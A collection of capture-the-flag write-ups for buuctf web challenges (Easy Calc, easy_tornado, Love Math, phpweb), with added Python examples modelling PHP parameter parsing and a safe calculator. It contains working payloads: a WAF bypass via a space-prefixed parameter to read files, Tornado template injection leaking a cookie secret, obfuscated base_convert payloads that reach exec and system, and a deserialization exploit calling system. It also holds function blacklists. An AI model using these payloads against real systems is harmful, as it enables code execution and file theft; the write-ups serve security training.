This post collects writeups for the code injection and command execution challenges in the web section of buuctf. It is still being updated.

[RoarCTF 2019]Easy Calc

writeup

Looking at the page source shows that the answer is fetched with a GET request to calc.php; opening calc.php directly shows its source.

<?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
    $str = $_GET['num'];
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $str)) {
            die("what are you want to do?");
        }
    }
    eval('echo '.$str.';');
}
?>

First, a word about how PHP parses query strings. PHP has to turn every parameter name into a valid variable name, so while parsing the query string it does two things:

  1. It strips whitespace
  2. It converts certain characters to underscores (spaces among them)

Taking this challenge as the example, a payload like the one below gets past the WAF. Where is the WAF? I don't know either: at first I assumed it was a WAF written in PHP and spent a long time looking for it, and only after reading other people's writeups did I find out that it isn't.

The WAF apparently does not allow letters in the value of the num parameter, so we send the parameter as %20num instead: the WAF then parses a parameter named %20num, while PHP parses it as num.

calc.php?%20num=
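As an added example (not code from the original writeup), here is a Python model of the parameter-name normalisation described above, with a hypothetical front-end filter that only allows arithmetic in `num`. Comparing the raw key and the normalised key shows why a filter placed in front of PHP has to normalise names the way PHP does before it compares them.

```python
import re
from urllib.parse import unquote_plus

# Added example, not part of the original writeup: a Python model of how PHP
# (main/php_variables.c) turns a raw query-string key into a key of $_GET.
# Leading spaces are dropped, ' ' and '.' become '_', and an unmatched '['
# becomes '_' too; a matched "[...]" is array syntax, so only the part before
# it is the top-level key.
def php_normalize_name(raw_key: str) -> str:
    name = unquote_plus(raw_key).lstrip(" ")
    out = []
    for i, ch in enumerate(name):
        if ch == "[":
            if "]" in name[i + 1:]:
                break                 # name[...]: keep the array base name only
            ch = "_"                  # unmatched '[' is rewritten to '_'
        elif ch in " .":
            ch = "_"
        out.append(ch)
    return "".join(out)

def raw_params(qs: str) -> dict:
    """Keys exactly as sent: what a front-end filter sees if it does not normalise."""
    params = {}
    for part in qs.split("&"):
        if part:
            key, _, value = part.partition("=")
            params[key] = unquote_plus(value)
    return params

def php_get(qs: str) -> dict:
    """The same query string as PHP's $_GET would hold it."""
    return {php_normalize_name(k): v for k, v in raw_params(qs).items()}

ARITHMETIC = re.compile(r"[0-9+\-*/().]*")   # what a calculator should accept

def filter_blocks(qs: str, normalise: bool) -> bool:
    """True if a filter that allows only arithmetic in 'num' rejects this request.
    normalise=False compares raw keys, the mismatch that lets %20num through."""
    params = php_get(qs) if normalise else raw_params(qs)
    value = params.get("num")
    return value is not None and ARITHMETIC.fullmatch(value) is None

if __name__ == "__main__":
    for qs in ("num=1%2B1", "num=var_dump(scandir(chr(47)))",
               "%20num=var_dump(scandir(chr(47)))"):
        print(f"{qs!r:38} PHP sees {php_get(qs)}  raw filter blocks="
              f"{filter_blocks(qs, False)}  normalised filter blocks={filter_blocks(qs, True)}")
```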

So we can list the filesystem to locate the flag file and then read it

calc.php?%20num=var_dump(scandir(chr(47)))	# list / to find the flag file

calc.php?%20num=var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))) # read the flag

We can also build the payload out of functions that take no parameters.

It can also be built with HTTP request smuggling; see https://www.moonback.xyz/2020/01/17/http走私学习/

In that case we add the following to the request headers, followed by a few extra line breaks:

Transfer-Encoding: chunked



Reference:

http://62.234.60.226/2019/10/19/RoarCTF-wp.html

[护网杯 2018]easy_tornado

writeup

Opening the challenge we see three files. flag.txt says the flag is in /fllllllllllllag, welcome.txt says render, and hints.txt says md5(cookie_secret+md5(filename)). Together with the challenge name, this points to template injection through render in Python's Tornado framework.

cookie_secret is stored in handler.settings, so we can read it out with this payload:

error?msg={{handler.settings}}

That reads cookie_secret successfully. Next, compute the file hash in the format given by the hint:

<?php
$cookie_secret='a33e0b4f-63b4-4ede-90b5-cc7bb45f48ca';
$filename='/fllllllllllllag';
echo md5($cookie_secret.md5($filename));

Request the file with that hash and we get the flag

file?filename=/fllllllllllllag&filehash=8089e3218f80b4c12a208cc0e9974d98

[CISCN 2019 初赛]Love Math

writeup

Source:

<?php
error_reporting(0);
// I hear you like math; I wonder whether you love it more than the flag
if(!isset($_GET['c'])){
    show_source(__FILE__);
}else{
    // example: c=20-1
    $content = $_GET['c'];
    if (strlen($content) >= 80) {
        die("太长了不会算");
    }
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $content)) {
            die("请不要输入奇奇怪怪的字符");
        }
    }
    // common math functions: http://www.w3school.com.cn/php/php_ref_math.asp
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func, $whitelist)) {
            die("请不要输入奇奇怪怪的函数");
        }
    }
    // compute the answer for you
    eval('echo '.$content.';');
}

hex2bin, the PHP function most often used to turn a value back into a string, is not in the whitelist, but we can try to construct its name out of whitelisted functions, and it turns out we can.

Construction steps:

<?php

echo base_convert("hex2bin",36,10)."\n";   // "hex2bin" read as a base-36 number: 37907361743
echo base_convert(37907361743,10,36)."\n"; // and back again: hex2bin
echo bin2hex("_GET")."\n";                 // 5f474554
echo hex2bin('5f474554')."\n";             // _GET
echo hexdec('5f474554')."\n";              // 1598506324
echo dechex(1598506324)."\n";              // 5f474554
echo hex2bin(dechex(1598506324))."\n";     // _GET

echo base_convert(37907361743,10,36)(dechex(1598506324)); // hex2bin("5f474554"), i.e. _GET, built only from whitelisted names

// $pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){1}(($$pi){2})

Other payloads:

$pi=base_convert,$pi(696468,10,36)(($pi(8768397090111664438,10,30))(){1})
// exec(getallheaders(){1})


base_convert(1751504350,10,36)(base_convert(15941,10,36).(dechex(16)^asinh^pi))
// system('cat *')

A fuzz script:

<?php
error_reporting(0);
$payload = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'bindec', 'ceil', 'cos', 'cosh', 'decbin' , 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
// XOR every whitelisted name with each two-digit string "00".."99" and print the result
// (the original loop started at index 1 and ran one past the end of the array; fixed here)
for($k=0;$k<sizeof($payload);$k++){
    for($i = 0;$i <= 9; $i++){
        for($j = 0;$j <= 9;$j++){
            $exp = $payload[$k] ^ $i.$j;   // string XOR; the result has the length of the shorter operand
            echo($payload[$k]."^$i$j"."==>$exp");
            echo "\n";
        }
    }
}
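As an added example, not code from the original challenge or writeup: the defender's side of Love Math, a calculator rewritten in Python that parses the expression into an AST and evaluates only numbers, arithmetic operators and calls whose callee is a literal, whitelisted name. A result produced by one whitelisted function therefore can never be used as the name of another function, which is exactly the gap the base_convert construction above exploits. `calc`, `rejects` and the function table are my own names.

```python
import ast
import math
import operator
# Added example, not from the original writeup: the Love Math calculator redone in
# Python without eval. Input is parsed to an AST and only fixed node types are
# evaluated, so a string built by one whitelisted function can never be called.
ALLOWED_FUNCS = {
    "abs": abs, "sqrt": math.sqrt, "sin": math.sin, "cos": math.cos,
    "tan": math.tan, "exp": math.exp, "log": math.log, "log10": math.log10,
    "pow": math.pow, "max": max, "min": min, "round": round, "pi": lambda: math.pi,
}
BIN_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul,
           ast.Div: operator.truediv, ast.Mod: operator.mod, ast.Pow: operator.pow}
UNARY_OPS = {ast.USub: operator.neg, ast.UAdd: operator.pos}

class CalcError(ValueError): ...

def _eval(node):
    if isinstance(node, ast.Constant) and type(node.value) in (int, float):
        return node.value                         # numbers only: no strings, no bools
    if isinstance(node, ast.BinOp) and type(node.op) in BIN_OPS:
        return BIN_OPS[type(node.op)](_eval(node.left), _eval(node.right))
    if isinstance(node, ast.UnaryOp) and type(node.op) in UNARY_OPS:
        return UNARY_OPS[type(node.op)](_eval(node.operand))
    if isinstance(node, ast.Call) and isinstance(node.func, ast.Name) and not node.keywords:
        func = ALLOWED_FUNCS.get(node.func.id)    # callee must be a literal, listed name
        if func is None:
            raise CalcError(f"function not allowed: {node.func.id}")
        return func(*[_eval(arg) for arg in node.args])
    # Names, strings, attributes, subscripts, calls on call results... all end up here
    raise CalcError(f"unsupported syntax: {type(node).__name__}")

def calc(expr: str, max_len: int = 80):
    """Same 80-character limit as the challenge; raise CalcError for anything else."""
    if len(expr) >= max_len:
        raise CalcError("too long")
    try:
        return _eval(ast.parse(expr, mode="eval").body)
    except CalcError:
        raise
    except (SyntaxError, ArithmeticError, ValueError, TypeError) as exc:
        raise CalcError(f"rejected: {exc}") from exc

def rejects(expr: str) -> bool:
    try:
        calc(expr)
    except CalcError:
        return True
    return False
```

The integer `**` path is still unbounded in size, so a production version should also cap operand magnitude before evaluating.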

[网鼎杯 2020 朱雀组]phpweb

writeup

A namespace prefix gets around all of the restrictions. Source:

<?php
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
function gettime($func, $p) {
    $result = call_user_func($func, $p);
    $a= gettype($result);
    if ($a == "string") {
        return $result;
    } else {return "";}
}
class Test {
    var $p = "Y-m-d h:i:s a";
    var $func = "date";
    function __destruct() {
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];

if ($func != null) {
    $func = strtolower($func);
    if (!in_array($func,$disable_fun)) {
        echo gettime($func, $p);
    }else {
        die("Hacker...");
    }
}
?>

Or via deserialization.


exp:

<?php
class Test {
    var $p = "id";
    var $func = "system";
}
$a =new Test;
echo serialize($a);

Reference:

https://www.cnblogs.com/20175211lyz/p/11588219.html
